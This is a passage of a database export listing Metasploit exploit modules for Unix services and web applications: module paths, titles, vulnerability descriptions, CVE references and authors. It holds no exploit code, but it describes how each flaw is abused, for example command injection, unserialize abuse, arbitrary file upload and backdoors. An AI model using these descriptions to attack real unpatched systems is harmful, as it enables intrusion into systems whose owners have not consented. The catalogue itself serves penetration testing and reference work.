LifeSize Room is an appliance and thus the environment is limited resulting in a small set of payload options.","Metasploit Framework License (BSD)","f","2011-07-13 00:00:00",0,,"aggressive","t","CVE-2011-2763, OSVDB-75212","Spencer McIntyre" 248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb","exploit","unix/irc/unreal_ircd_3281_backdoor","exploit/unix/irc/unreal_ircd_3281_backdoor","UnrealIRCD 3.2.8.1 Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.","Metasploit Framework License (BSD)","f","2010-06-12 00:00:00",0,,"aggressive","t","CVE-2010-2075, OSVDB-65445, URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt","hdm " 249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/local/setuid_nmap.rb","exploit","unix/local/setuid_nmap","exploit/unix/local/setuid_nmap","Setuid Nmap Exploit",600,"Nmap's man page mentions that ""Nmap should never be installed with special privileges (e.g. suid root) for security reasons.."" and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). 
Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.","Metasploit Framework License (BSD)","f","2012-07-19 00:00:00",0,,"aggressive","t",,"egypt " 250,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/distcc_exec.rb","exploit","unix/misc/distcc_exec","exploit/unix/misc/distcc_exec","DistCC Daemon Command Execution",600,"This module uses a documented security weakness to execute arbitrary commands on any system running distccd.","Metasploit Framework License (BSD)","f","2002-02-01 00:00:00",0,,"aggressive","t","CVE-2004-2687, OSVDB-13378, URL-http://distcc.samba.org/security.html","hdm " 251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/qnx_qconn_exec.rb","exploit","unix/misc/qnx_qconn_exec","exploit/unix/misc/qnx_qconn_exec","QNX QCONN Remote Command Execution Vulnerability",600,"This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.","Metasploit Framework License (BSD)","f","2012-09-04 00:00:00",0,,"aggressive","t","EDB-21520, OSVDB-86672, URL-http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos, URL-http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html","Brendan Coles , David Odell, Mor!p3r " 252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/spamassassin_exec.rb","exploit","unix/misc/spamassassin_exec","exploit/unix/misc/spamassassin_exec","SpamAssassin spamd Remote Command Execution",600,"This module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). 
Versions prior to v3.1.3 are vulnerable.","Metasploit Framework License (BSD)","f","2006-06-06 00:00:00",0,,"aggressive","t","BID-18290, CVE-2006-2447, OSVDB-26177, URL-http://spamassassin.apache.org/advisories/cve-2006-2447.txt","patrick " 253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/zabbix_agent_exec.rb","exploit","unix/misc/zabbix_agent_exec","exploit/unix/misc/zabbix_agent_exec","Zabbix Agent net.tcp.listen Command Injection",600,"This module exploits a metacharacter injection vulnerability in the FreeBSD and Solaris versions of the Zabbix agent. This flaw can only be exploited if the attacker can hijack the IP address of an authorized server (as defined in the configuration file).","Metasploit Framework License (BSD)","f","2009-09-10 00:00:00",0,,"aggressive","t","CVE-2009-4502, OSVDB-60956, URL-https://support.zabbix.com/browse/ZBX-1032","hdm " 254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/smtp/clamav_milter_blackhole.rb","exploit","unix/smtp/clamav_milter_blackhole","exploit/unix/smtp/clamav_milter_blackhole","ClamAV Milter Blackhole-Mode Remote Code Execution",600,"This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.","Metasploit Framework License (BSD)","t","2007-08-24 00:00:00",0,,"aggressive","t","BID-25439, CVE-2007-4560, EDB-4761, OSVDB-36909","patrick " 255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/smtp/exim4_string_format.rb","exploit","unix/smtp/exim4_string_format","exploit/unix/smtp/exim4_string_format","Exim4 <= 4.69 string_format Function Heap Buffer Overflow",600,"This module exploits a heap buffer overflow within versions of Exim prior to version 4.69. 
By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, the string we sent will be evaluated with 'expand_string' and arbitrary shell commands can be executed. It is likely that this issue could also be exploited using other techniques such as targeting in-band heap management structures, or perhaps even function pointers stored in the heap. However, these techniques would likely be far more platform specific, more complicated, and less reliable. This bug was originally found and reported in December 2008, but was not properly handled as a security issue. Therefore, there was a 2 year lag time between when the issue was fixed and when it was discovered being exploited in the wild. At that point, the issue was assigned a CVE and began being addressed by downstream vendors. An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of the danger of this bug. This bug allows a local user to gain root privileges from the Exim user account. 
If the Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to get root.","Metasploit Framework License (BSD)","t","2010-12-07 00:00:00",0,,"aggressive","t","BID-45308, BID-45341, CVE-2010-4344, CVE-2010-4345, OSVDB-69685, URL-http://bugs.exim.org/show_bug.cgi?id=787, URL-http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b, URL-http://seclists.org/oss-sec/2010/q4/311, URL-http://www.gossamer-threads.com/lists/exim/dev/89477","hdm , jduck " 256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ssh/tectia_passwd_changereq.rb","exploit","unix/ssh/tectia_passwd_changereq","exploit/unix/ssh/tectia_passwd_changereq","Tectia SSH USERAUTH Change Request Password Reset Vulnerability",600,"This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.","Metasploit Framework License (BSD)","t","2012-12-01 00:00:00",0,,"aggressive","t","CVE-2012-5975, EDB-23082, OSVDB-88103, URL-http://seclists.org/fulldisclosure/2012/Dec/12, URL-http://www.ssh.com/index.php/component/content/article/531.html","bperry, kingcope, sinn3r " 257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstats_configdir_exec.rb","exploit","unix/webapp/awstats_configdir_exec","exploit/unix/webapp/awstats_configdir_exec","AWStats configdir Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. 
iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.","Metasploit Framework License (BSD)","f","2005-01-15 00:00:00",0,,"aggressive","t","BID-12298, CVE-2005-0116, OSVDB-13002, URL-http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities","Matteo Cantoni , hdm " 258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstats_migrate_exec.rb","exploit","unix/webapp/awstats_migrate_exec","exploit/unix/webapp/awstats_migrate_exec","AWStats migrate Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default).","Metasploit Framework License (BSD)","f","2006-05-04 00:00:00",0,,"aggressive","t","BID-17844, CVE-2006-2237, EDB-1755, OSVDB-25284, URL-http://awstats.sourceforge.net/awstats_security_news.php","patrick " 259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstatstotals_multisort.rb","exploit","unix/webapp/awstatstotals_multisort","exploit/unix/webapp/awstatstotals_multisort","AWStats Totals =< v1.14 multisort Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. 
AWStats Totals versions v1.0 - v1.14 are vulnerable.","Metasploit Framework License (BSD)","f","2008-08-26 00:00:00",0,,"aggressive","t","BID-30856, CVE-2008-3922, OSVDB-47807, URL-http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt","patrick " 260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/barracuda_img_exec.rb","exploit","unix/webapp/barracuda_img_exec","exploit/unix/webapp/barracuda_img_exec","Barracuda IMG.PL Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.","Metasploit Framework License (BSD)","f","2005-09-01 00:00:00",0,,"aggressive","t","BID-14712, CVE-2005-2847, OSVDB-19279, URL-http://www.nessus.org/plugins/index.php?view=single&id=19556, URL-http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1","Nicolas Gregoire , hdm " 261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/base_qry_common.rb","exploit","unix/webapp/base_qry_common","exploit/unix/webapp/base_qry_common","BASE base_qry_common Remote File Include",600,"This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.","Metasploit Framework License (BSD)","f","2008-06-14 00:00:00",0,,"aggressive","t","BID-18298, CVE-2006-2685, OSVDB-49366","MC " 262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/basilic_diff_exec.rb","exploit","unix/webapp/basilic_diff_exec","exploit/unix/webapp/basilic_diff_exec","Basilic 1.5.14 diff.php Arbitrary Command Execution",600,"This module abuses a metacharacter injection vulnerability in the diff.php script. 
This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.","Metasploit Framework License (BSD)","t","2012-06-28 00:00:00",0,,"aggressive","t","BID-54234, OSVDB-83719","juan vazquez , lcashdollar, sinn3r " 263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/cacti_graphimage_exec.rb","exploit","unix/webapp/cacti_graphimage_exec","exploit/unix/webapp/cacti_graphimage_exec","Cacti graph_view.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to 0.8.6-d are vulnerable.","Metasploit Framework License (BSD)","f","2005-01-15 00:00:00",0,,"aggressive","t","BID-14042, OSVDB-17539","David Maciejak , hdm " 264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/cakephp_cache_corruption.rb","exploit","unix/webapp/cakephp_cache_corruption","exploit/unix/webapp/cakephp_cache_corruption","CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Code Execution",600,"CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"aggressive","t","BID-44852, CVE-2010-4335, OSVDB-69352, URL-http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt","Felix Wilhelm, tdz" 265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb","exploit","unix/webapp/citrix_access_gateway_exec","exploit/unix/webapp/citrix_access_gateway_exec","Citrix Access Gateway Command Execution",600,"The Citrix Access Gateway provides support for multiple authentication types. 
When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway.","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",0,,"aggressive","t","BID-45402, CVE-2010-4566, OSVDB-70099, URL-http://www.vsecurity.com/resources/advisory/20101221-1/","Erwin Paternotte, George D. Gal" 266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/coppermine_piceditor.rb","exploit","unix/webapp/coppermine_piceditor","exploit/unix/webapp/coppermine_piceditor","Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",600,"This module exploits a vulnerability in the picEditor.php script of Coppermine Photo Gallery. When configured to use the ImageMagick library, the 'quality', 'angle', and 'clipval' parameters are not properly escaped before being passed to the PHP 'exec' command. In order to reach the vulnerable 'exec' call, the input must pass several validation steps. The vulnerabilities actually reside in the following functions: image_processor.php: rotate_image(...) include/imageObjectIM.class.php: imageObject::cropImage(...) include/imageObjectIM.class.php: imageObject::rotateImage(...) include/imageObjectIM.class.php: imageObject::resizeImage(...) include/picmgmt.inc.php: resize_image(...) NOTE: Use of the ImageMagick library is a non-default option. 
However, a user can specify its use at installation time.","Metasploit Framework License (BSD)","t","2008-01-30 00:00:00",0,,"aggressive","t","CVE-2008-0506, EDB-5019, OSVDB-41676, URL-http://forum.coppermine-gallery.net/index.php?topic=50103.0","Janek Vind, jduck " 267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/datalife_preview_exec.rb","exploit","unix/webapp/datalife_preview_exec","exploit/unix/webapp/datalife_preview_exec","DataLife Engine preview.php PHP Code Injection",600,"This module exploits a PHP code injection vulnerability in DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() with the e modifier, which allows injection of arbitrary PHP code when there is a template installed which contains a [catlist] or [not-catlist] tag, even when the template isn't currently in use. The template can be configured with the TEMPLATE datastore option.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",0,,"aggressive","t","BID-57603, CVE-2013-1412, EDB-24438, URL-http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html, URL-http://karmainsecurity.com/KIS-2013-01","EgiX, juan vazquez " 268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/dogfood_spell_exec.rb","exploit","unix/webapp/dogfood_spell_exec","exploit/unix/webapp/dogfood_spell_exec","Dogfood CRM spell.php Remote Command Execution",600,"This module exploits a previously unpublished vulnerability in the Dogfood CRM mail function, which is vulnerable to command injection in the spell check feature. Because of character restrictions, this exploit works best with the double-reverse telnet payload. 
This vulnerability was discovered by LSO and affects v2.0.10.","BSD License","f","2009-03-03 00:00:00",0,,"aggressive","t","OSVDB-54707, URL-http://downloads.sourceforge.net/dogfood/","LSO , patrick " 269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/egallery_upload_exec.rb","exploit","unix/webapp/egallery_upload_exec","exploit/unix/webapp/egallery_upload_exec","EGallery PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in EGallery 1.2. By abusing the uploadify.php file, a malicious user can upload a file to the egallery/ directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-07-08 00:00:00",0,,"aggressive","t","BID-54464, OSVDB-83891, URL-http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html","Sammy FORGIT, juan vazquez " 270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/foswiki_maketext.rb","exploit","unix/webapp/foswiki_maketext","exploit/unix/webapp/foswiki_maketext","Foswiki MAKETEXT Remote Command Execution",600,"This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since the input is passed to the Perl ""eval"" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. Only Foswiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set) are vulnerable. If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the FoswikiPage option isn't provided, the module will try to create a random page on the SandBox space. 
The module has been tested successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.","Metasploit Framework License (BSD)","f","2012-12-03 00:00:00",0,,"aggressive","t","CVE-2012-6329, OSVDB-88410, URL-http://foswiki.org/Support/SecurityAlert-CVE-2012-6330","Brian Carlson, juan vazquez " 271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/generic_exec.rb","exploit","unix/webapp/generic_exec","exploit/unix/webapp/generic_exec","Generic Web Application Unix Command Execution",600,"This module can be used to exploit any generic command execution vulnerability for CGI applications on Unix-like platforms. To use this module, specify the CMDURI path, replacing the command itself with XXcmdXX. This module is currently limited to forms vulnerable through GET requests with query parameters.","Metasploit Framework License (BSD)","f","1993-11-14 00:00:00",0,,"aggressive","t",,"hdm " 272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb","exploit","unix/webapp/google_proxystylesheet_exec","exploit/unix/webapp/google_proxystylesheet_exec","Google Appliance ProxyStyleSheet Command Execution",600,"This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). 
The target appliance must be able to connect back to your machine for this exploit to work.","Metasploit Framework License (BSD)","f","2005-08-16 00:00:00",0,,"aggressive","t","BID-15509, CVE-2005-3757, OSVDB-20981","hdm " 273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/guestbook_ssi_exec.rb","exploit","unix/webapp/guestbook_ssi_exec","exploit/unix/webapp/guestbook_ssi_exec","Matt Wright guestbook.pl Arbitrary Command Execution",600,"The Matt Wright guestbook.pl <= v2.3.1 CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.","Metasploit Framework License (BSD)","f","1999-11-05 00:00:00",0,,"aggressive","t","BID-776, CVE-1999-1053, OSVDB-84","patrick " 274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/hastymail_exec.rb","exploit","unix/webapp/hastymail_exec","exploit/unix/webapp/hastymail_exec","Hastymail 2.1.1 RC1 Command Injection",600,"This module exploits a command injection vulnerability found in Hastymail 2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on the ""lib/ajax_functions.php"" script. Authentication is required on Hastymail in order to exploit the vulnerability. 
The module has been successfully tested on Hastymail 2.1.1 RC1 over Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2011-11-22 00:00:00",0,,"aggressive","t","BID-50791, CVE-2011-4542, OSVDB-77331, URL-https://www.dognaedis.com/vulns/DGS-SEC-3.html","Bruno Teixeira, juan vazquez " 275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb","exploit","unix/webapp/invision_pboard_unserialize_exec","exploit/unix/webapp/invision_pboard_unserialize_exec","Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in Invision IP.Board <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the '/admin/sources/base/core.php' script, which is called with user controlled data from the cookie. The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code to a file on the Invision IP.Board web directory. The exploit has been tested successfully on Invision IP.Board 3.3.4.","Metasploit Framework License (BSD)","f","2012-10-25 00:00:00",0,,"aggressive","t","BID-56288, CVE-2012-5692, EDB-22398, OSVDB-86702, URL-http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/","EgiX, juan vazquez , sinn3r " 276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb","exploit","unix/webapp/joomla_comjce_imgmanager","exploit/unix/webapp/joomla_comjce_imgmanager","Joomla Component JCE File Upload Remote Code Execution",600,"This module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by a failure to sufficiently sanitize user-supplied input. 
By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.","Metasploit Framework License (BSD)","f","2012-08-02 00:00:00",0,,"aggressive","t","BID-49338, EDB-17734","Heyder Andrade , Unknown" 277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/joomla_tinybrowser.rb","exploit","unix/webapp/joomla_tinybrowser","exploit/unix/webapp/joomla_tinybrowser","Joomla 1.5.12 TinyBrowser File Upload Code Execution",600,"This module exploits a vulnerability in the TinyMCE/tinybrowser plugin. This plugin is not secured in version 1.5.12 of Joomla and allows the upload of files on the remote server. By renaming the uploaded file this vulnerability can be used to upload/execute code on the affected system.","Metasploit Framework License (BSD)","f","2009-07-22 00:00:00",0,,"aggressive","t","CVE-2011-4908, EDB-9296, OSVDB-64578, URL-http://developer.joomla.org/security/news/301-20090722-core-file-upload.html","spinbad " 278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mambo_cache_lite.rb","exploit","unix/webapp/mambo_cache_lite","exploit/unix/webapp/mambo_cache_lite","Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",600,"This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.","Metasploit Framework License (BSD)","f","2008-06-14 00:00:00",0,,"aggressive","t","BID-29716, CVE-2008-2905, OSVDB-46173","MC " 279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mitel_awc_exec.rb","exploit","unix/webapp/mitel_awc_exec","exploit/unix/webapp/mitel_awc_exec","Mitel Audio and Web Conferencing Command Injection",600,"This module exploits a command 
injection flaw within the Mitel Audio and Web Conferencing web interface.","Metasploit Framework License (BSD)","f","2010-12-12 00:00:00",0,,"aggressive","t","OSVDB-69934, URL-http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14","hdm " 280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mybb_backdoor.rb","exploit","unix/webapp/mybb_backdoor","exploit/unix/webapp/mybb_backdoor","myBB 1.6.4 Backdoor Arbitrary Command Execution",600,"myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor's source package.","Metasploit Framework License (BSD)","f","2011-10-06 00:00:00",0,,"aggressive","t","BID-49993, SECUNIA-46300, URL-http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/, URL-http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt","tdz" 281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios3_history_cgi.rb","exploit","unix/webapp/nagios3_history_cgi","exploit/unix/webapp/nagios3_history_cgi","Nagios3 history.cgi Host Command Execution",500,"This module abuses a command injection vulnerability in the Nagios3 history.cgi script.","Metasploit Framework License (BSD)","f","2012-12-09 00:00:00",0,,"aggressive","t","BID-56879, CVE-2012-6096, EDB-24084, OSVDB-88322, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html","Daniele Martini , Jose Selvi , Unknown , blasty " 282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb","exploit","unix/webapp/nagios3_statuswml_ping","exploit/unix/webapp/nagios3_statuswml_ping","Nagios3 statuswml.cgi Ping Command Execution",600,"This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. 
This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands.","Metasploit Framework License (BSD)","f","2009-06-22 00:00:00",0,,"aggressive","t","CVE-2009-2288, OSVDB-55281","hdm " 283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios_graph_explorer.rb","exploit","unix/webapp/nagios_graph_explorer","exploit/unix/webapp/nagios_graph_explorer","Nagios XI Network Monitor Graph Explorer Component Command Injection",600,"This module exploits a vulnerability found in Nagios XI Network Monitor's component 'Graph Explorer'. An authenticated user can execute system commands by injecting them into several parameters, such as visApi.php's 'host' parameter, which results in remote code execution.","Metasploit Framework License (BSD)","f","2012-11-30 00:00:00",0,,"aggressive","t","BID-54263, OSVDB-83552, URL-http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html","Daniel Compton , sinn3r " 284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/narcissus_backend_exec.rb","exploit","unix/webapp/narcissus_backend_exec","exploit/unix/webapp/narcissus_backend_exec","Narcissus Image Configuration Passthru Vulnerability",600,"This module exploits a vulnerability found in the Narcissus image configuration function. This is due to the backend.php file not handling the $release parameter properly and then passing it on to the configure_image() function. 
In this function, the $release parameter can be used to inject system commands for passthru (a PHP function that's meant to be used to run a bash script by the vulnerable application), which allows remote code execution under the context of the web server.","Metasploit Framework License (BSD)","f","2012-11-14 00:00:00",0,,"aggressive","t","EDB-22709, OSVDB-87410","Dun, sinn3r " 285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openemr_upload_exec.rb","exploit","unix/webapp/openemr_upload_exec","exploit/unix/webapp/openemr_upload_exec","OpenEMR PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2013-02-13 00:00:00",0,,"aggressive","t","BID-37314, EBD-24492, OSVDB-90222, URL-http://www.open-emr.org/wiki/index.php/OpenEMR_Patches, URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php","Gjoko Krstic , juan vazquez " 286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openview_connectednodes_exec.rb","exploit","unix/webapp/openview_connectednodes_exec","exploit/unix/webapp/openview_connectednodes_exec","HP Openview connectedNodes.ovpl Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. 
The results of the command will be displayed to the screen.","Metasploit Framework License (BSD)","f","2005-08-25 00:00:00",0,,"aggressive","t","BID-14662, CVE-2005-2773, OSVDB-19057","Valerio Tesei , hdm " 287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openx_banner_edit.rb","exploit","unix/webapp/openx_banner_edit","exploit/unix/webapp/openx_banner_edit","OpenX banner-edit.php File Upload PHP Code Execution",600,"This module exploits a vulnerability in the OpenX advertising software. In versions prior to version 2.8.2, authenticated users can upload files with arbitrary extensions to be used as banner creative content. By uploading a file with a PHP extension, an attacker can execute arbitrary PHP code. NOTE: The file must also return either ""png"", ""gif"", or ""jpeg"" as its image type as returned from the PHP getimagesize() function.","Metasploit Framework License (BSD)","f","2009-11-24 00:00:00",0,,"aggressive","t","BID-37110, CVE-2009-4098, OSVDB-60499, URL-http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html, URL-http://gynvael.coldwind.pl/?id=223, URL-http://gynvael.coldwind.pl/?id=224, URL-http://gynvael.coldwind.pl/?id=235, URL-http://php.net/manual/en/function.getimagesize.php, URL-http://programming.arantius.com/the+smallest+possible+gif, URL-http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes, URL-http://www.openx.org/docs/2.8/release-notes/openx-2.8.2, URL-https://developer.openx.org/jira/browse/OX-5747","jduck " 288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb","exploit","unix/webapp/oracle_vm_agent_utl","exploit/unix/webapp/oracle_vm_agent_utl","Oracle VM Server Virtual Server Agent Command Injection",600,"This module exploits a command injection flaw within Oracle's VM Server Virtual Server Agent (ovs-agent) service. 
By including shell metacharacters within the second parameter to the 'utl_test_url' XML-RPC methodCall, an attacker can execute arbitrary commands. The service typically runs with root privileges. NOTE: Valid credentials are required to trigger this vulnerability. The username appears to be hardcoded as 'oracle', but the password is set by the administrator at installation time.","Metasploit Framework License (BSD)","t","2010-10-12 00:00:00",0,,"aggressive","t","BID-44047, CVE-2010-3585, OSVDB-68797","jduck " 289,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/oscommerce_filemanager.rb","exploit","unix/webapp/oscommerce_filemanager","exploit/unix/webapp/oscommerce_filemanager","osCommerce 2.2 Arbitrary PHP Code Execution",600,"osCommerce is a popular open source E-Commerce application. The admin console contains a file management utility that allows administrators to upload, download, and edit files. This could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.","Metasploit Framework License 